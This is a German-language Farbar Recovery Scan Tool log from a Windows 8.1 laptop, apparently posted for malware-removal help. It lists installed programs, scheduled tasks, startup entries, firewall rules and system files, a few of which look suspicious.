2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2016-03-30 14:04 ==================== Ende von FRST.txt ============================ FRST-Addition: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-31 12:40:43)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-31 12:32 - 2016-03-31 12:32 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer
30-03-2016 12:51:51 Revo Uninstaller's restore point - Google Chrome
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (03/31/2016 12:34:33 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
